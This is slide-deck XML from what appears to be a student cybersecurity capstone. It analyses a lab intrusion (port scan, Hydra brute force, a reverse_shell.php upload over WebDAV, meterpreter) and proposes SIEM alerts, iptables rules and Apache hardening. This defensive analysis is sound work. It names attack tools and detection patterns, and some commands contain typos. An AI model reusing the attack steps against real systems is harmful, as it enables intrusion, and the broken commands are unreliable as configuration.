          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="18280301" y="3662159"/>
            <a:ext cx="2133487" cy="2200334"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1187" name="Google Shape;1187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8" name="Google Shape;1188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66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="19348675" y="6106550"/>
            <a:ext cx="14819400" cy="14172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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19993125" y="6228675"/>
            <a:ext cx="12925200" cy="14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739075" lIns="739075" spcFirstLastPara="1" rIns="739075" wrap="square" tIns="739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In this case the reverse shell connection allowed for the successful exfiltration of sensitive data, and the persistent threat of a back door into the capstone machine, However the successful launching of a meterpreter session has the potential to cause unprecedented damage.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7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Persistent reverse shell backdoor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1196" name="Google Shape;1196;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2897100" y="3174475"/>
            <a:ext cx="30935700" cy="17103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6325" y="3174475"/>
            <a:ext cx="8256744" cy="63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4325" y="13820325"/>
            <a:ext cx="7688739" cy="636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098" y="9725713"/>
            <a:ext cx="21061550" cy="40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7100" y="3174475"/>
            <a:ext cx="6656875" cy="6364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1" name="Google Shape;1201;p67"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8383426" y="2201109"/>
            <a:ext cx="2133487" cy="2200334"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1202" name="Google Shape;1202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3" name="Google Shape;1203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67"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="17933126" y="2201109"/>
            <a:ext cx="2133487" cy="2200334"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1205" name="Google Shape;1205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6" name="Google Shape;1206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67"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="21977776" y="7525397"/>
            <a:ext cx="2133487" cy="2200334"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1208" name="Google Shape;1208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9" name="Google Shape;1209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67"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="17933126" y="13207434"/>
            <a:ext cx="2133487" cy="2200334"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1211" name="Google Shape;1211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12" name="Google Shape;1212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68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Persistent reverse shell backdoor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1218" name="Google Shape;1218;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2897100" y="5273050"/>
            <a:ext cx="30935700" cy="1432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9" name="Google Shape;12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8000" y="6056100"/>
            <a:ext cx="11446701" cy="130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100" y="5273050"/>
            <a:ext cx="18324950" cy="43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088" y="10748641"/>
            <a:ext cx="18324950" cy="33744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2" name="Google Shape;1222;p68"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="19088551" y="3507909"/>
            <a:ext cx="2133487" cy="2200334"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1223" name="Google Shape;1223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4" name="Google Shape;1224;p6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5" name="Google Shape;1225;p68"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="19088551" y="9124309"/>
            <a:ext cx="2133487" cy="2200334"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1226" name="Google Shape;1226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7" name="Google Shape;1227;p6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8" name="Google Shape;1228;p68"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="30771201" y="4393109"/>
            <a:ext cx="2133487" cy="2200334"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1229" name="Google Shape;1229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30" name="Google Shape;1230;p6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1" name="Google Shape;123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44225" y="15915926"/>
            <a:ext cx="8255225" cy="165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68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3082900" y="4151250"/>
            <a:ext cx="857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200"/>
              <a:t>“msfconsole”</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="4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6" y="1195676"/>
            <a:ext cx="34350642" cy="18358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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097300" y="6959070"/>
            <a:ext cx="34381200" cy="3665100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t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137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37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13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9" name="Google Shape;1239;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34431100" y="20445691"/>
            <a:ext cx="1047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0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45" name="Google Shape;1245;p70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1469400" y="6053858"/>
            <a:ext cx="33637200" cy="9833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5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6" name="Google Shape;1246;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1469400" y="15886950"/>
            <a:ext cx="25693500" cy="4007700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1847775" spcFirstLastPara="1" rIns="1847775" wrap="square" tIns="369500">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-660400" lvl="0" marL="12827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000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Initial scan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>occurred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> at</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>11:30:01, 22-01-13.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4800"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-660400" lvl="0" marL="12827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000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1004 packets were sent in total, all originating from </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="4800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-660400" lvl="0" marL="12827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4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The fact that all of these requests were made at the exact same time, to different ports,      is indicative of this being a port scan.</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1247" name="Google Shape;12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400" y="7571408"/>
            <a:ext cx="33637200" cy="679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1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3" name="Google Shape;1253;p71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1616225" y="4035208"/>
            <a:ext cx="33637200" cy="9833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4" name="Google Shape;12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376" y="4042875"/>
            <a:ext cx="31980908" cy="98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71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1616225" y="14614150"/>
            <a:ext cx="25013400" cy="5352000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1847775" spcFirstLastPara="1" rIns="1847775" wrap="square" tIns="369500">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-609600" lvl="0" marL="12827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Between </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="4000"/>
              <a:t>11:45:29</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="4000"/>
              <a:t>11:46:18</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="4000"/>
              <a:t>22-01-13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="4000"/>
              <a:t>3,638</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000"/>
              <a:t> GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000"/>
              <a:t>requests were made to  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“company_folder/secret_folder” </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and its subdirectories.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-609600" lvl="0" marL="12827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The </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="4000"/>
              <a:t>“company_folder/secret_folder” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000"/>
              <a:t>was requested 3,636 times. 3,633 of these requests were automated with hydra. The </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“company_folder/secret_folder/</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="4000"/>
              <a:t>connect_to_crop_sever</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000"/>
              <a:t>”, which contained details on how to connect to the WebDAV, was requested a further 2 times. All traffic came from </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="4000"/>
              <a:t>“192.168.1.90”</a:t>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1256" name="Google Shape;125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6888" y="14614150"/>
            <a:ext cx="9216528" cy="34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72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2" name="Google Shape;1262;p72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1469400" y="6053858"/>
            <a:ext cx="33637200" cy="9833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Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="5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Google Shape;1263;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1469400" y="16078850"/>
            <a:ext cx="27686700" cy="4007700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1847775" spcFirstLastPara="1" rIns="1847775" wrap="square" tIns="369500">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-609600" lvl="0" marL="12827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We can determine that there were 3633 requests made by Hydra in the brute force attempt, by filtering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000"/>
              <a:t>for the user agent: </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="4000"/>
              <a:t>“Mozilla/4.0 (Hydra)”</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="4000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-609600" lvl="0" marL="12827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Cross referencing this with the amount of 401 errors we can determine that it took 3628 attempts before successfully gaining access to the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="4000"/>
              <a:t>“secret_folder”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000"/>
              <a:t>directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1264" name="Google Shape;12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400" y="8838775"/>
            <a:ext cx="33637201" cy="593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627" y="6492875"/>
            <a:ext cx="27686750" cy="18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5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5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</p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1847775" spcFirstLastPara="1" rIns="1847775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>
            <a:off x="5410200" y="5686886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55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1828799" y="5686774"/>
            <a:ext cx="3107557" cy="2562490"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1027" name="Google Shape;102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121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55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1828799" y="9192190"/>
            <a:ext cx="3107557" cy="256249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1828799" y="12677861"/>
            <a:ext cx="3107557" cy="256249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1828799" y="16183225"/>
            <a:ext cx="3107557" cy="256249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12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55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-49800" y="5686886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" sz="7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7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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410200" y="9202194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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410200" y="1267792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5410200" y="16163591"/>
            <a:ext cx="30068400" cy="256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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-49700" y="921215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" sz="7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7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7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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600" y="12687922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" sz="7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7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7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49200" y="16163591"/>
            <a:ext cx="366744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2375" spcFirstLastPara="1" rIns="18477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" sz="7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7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7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3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1" name="Google Shape;1271;p73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1469400" y="3925108"/>
            <a:ext cx="33637200" cy="9833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2" name="Google Shape;12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500" y="3925100"/>
            <a:ext cx="32031001" cy="98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73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1469400" y="14614150"/>
            <a:ext cx="24264300" cy="4007700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1847775" spcFirstLastPara="1" rIns="1847775" wrap="square" tIns="369500">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-609600" lvl="0" marL="12827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790,077 requests were made to the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="4000"/>
              <a:t>WebDAV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000"/>
              <a:t> directory, 789,987 of these can be attributed to brute force attempts. A further 50 are successful connections, 39 were accessing the payload “reverse_shell.php” and 1 was accessing the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="4000"/>
              <a:t>“password.dav”</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="4000"/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6" y="1195676"/>
            <a:ext cx="34350642" cy="18358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74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097300" y="6728102"/>
            <a:ext cx="34381200" cy="8356800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t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137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37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13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0" name="Google Shape;1280;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34431100" y="20445691"/>
            <a:ext cx="1047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75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86" name="Google Shape;1286;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6270575"/>
            <a:ext cx="17193600" cy="12933000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1847775" spcFirstLastPara="1" rIns="18477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We can set an alarm to detect port scans, and send an email to SOC using the following criteria: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900"/>
              <a:t>source_ip=”NOT 192.168.1.105”</a:t>
            </a:r>
            <a:endParaRPr i="1"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900"/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="3900"/>
              <a:t>estination_ip=”192.168.1.105”</a:t>
            </a:r>
            <a:endParaRPr i="1"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900"/>
              <a:t>destination_port=”NOT (“443” OR “80”)”</a:t>
            </a:r>
            <a:endParaRPr i="1"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With a threshold of &gt; 3 events within a second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1287" name="Google Shape;1287;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17867200" y="6270575"/>
            <a:ext cx="18708900" cy="13966200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1847775" spcFirstLastPara="1" rIns="18477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Configuring the Linux iptables response to tcp flags will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4300"/>
              <a:t>prevent an attacker from successfully enumerating our network. By dropping packets instead of sending a response, the ports will seem closed to a port scanner.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This can be done with the following commands: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IPTABLES -A INPUT -p tcp -tcp-flags SYN,ACK SYN,ACK -m sr=tate -state NEW -j DROP</a:t>
            </a:r>
            <a:endParaRPr i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</a:rPr>
              <a:t>IPTABLES -A INPUT -p tcp -tcp-flags ALL NONE -j DROP</a:t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</a:rPr>
              <a:t>IPTABLES -A INPUT -p tcp -tcp-flags SYN,FIN SYN,FIN -j DROP</a:t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</a:rPr>
              <a:t>IPTABLES -A INPUT -p tcp -tcp-flags SYN,RST SYN,RST -j DROP</a:t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</a:rPr>
              <a:t>IPTABLES -A INPUT -p tcp -tcp-flags ALL SYN,RST, ACL,FIN,URG -j DROP</a:t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</a:rPr>
              <a:t>IPTABLES -A INPUT -p tcp -tcp-flags FIN,RST FIN,RST -j DROP</a:t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</a:rPr>
              <a:t>IPTABLES -A INPUT -p tcp -tcp-flags ACK,FIN FIN -j DROP</a:t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</a:rPr>
              <a:t>IPTABLES -A INPUT -p tcp -tcp-flags ACK,PSH PSH -j DROP</a:t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</a:rPr>
              <a:t>IPTABLES -A INPUT -p tcp -tcp-flags ACK, URG URG -j DROP</a:t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We can also disallow any traffic to and from any unnecessary ports with the following command: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IPTABLES -A INPUT -p tcp -m tcp -m multiport ! -dports 80,443 -j DROP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6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93" name="Google Shape;1293;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-49200" y="6229850"/>
            <a:ext cx="17193600" cy="13997700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1847775" spcFirstLastPara="1" rIns="18477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We can set an alarm to detect unauthorized access to </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“secret_folder”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, and send an email to SOC using the following criteria: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900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>source_ip= “NOT (“192.168.1.105” OR “192.168.1.1”)”</a:t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900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url.full= “http://192.168.1.105/company_folders/secret_folder”</a:t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With a threshold of &gt; 0 events within a minute.</a:t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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1294" name="Google Shape;1294;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17712325" y="6229725"/>
            <a:ext cx="19788900" cy="13997700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1847775" spcFirstLastPara="1" rIns="18477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Best practise would be to change the apache servers configuration to disable directory listing.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This can be done with the following commands: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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“sudo sed -i ‘s/Options Indexes FollowSymLinks/Options FollowSymLinks/g’  /etc/apache2/apache2.conf” </a:t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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“sudo service apache2 reload”</a:t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Further configuration of the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“apache.conf” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file would prevent undefined ip addresses from accessing the server. We can do this easily using the following commands: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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“sudo sed -i “/# access here, or in any related virtual host/a&lt;Directory \/var\/www\/company_folders\/secret_folder\/&gt;\n\tOrder deny,allow\n\tdeny from all\n\tAllow from 192.168.1.1\n\tAllow from 192.168.1.105\n&lt;\/Directoy&gt;” /etc/apache2/apache.conf”</a:t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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“sudo service apache2 reload”</a:t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7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00" name="Google Shape;1300;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-49200" y="6107700"/>
            <a:ext cx="18290700" cy="14119800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1847775" spcFirstLastPara="1" rIns="18477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We can set an alarm to detect brute force attacks via hydra, and send an email to SOC using the following criteria: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900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_agent.original=”Mozilla/4.0 (hydra)”</a:t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Because this user agent is exclusive to hydra we can set a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>threshold</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of &gt;0 within a minute and be certain that it is a brute force attack.</a:t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In order to detect brute force attacks utilizing a platform other than hydra I’d suggest a more general alert also to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>triggered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> by: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900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>response_status_code=”401”</a:t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With a threshold of &gt;10 </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“401”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> status codes to a single address within a minute.</a:t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900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1301" name="Google Shape;1301;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17867200" y="6116975"/>
            <a:ext cx="18708900" cy="14119800"/>
          </a:xfrm>
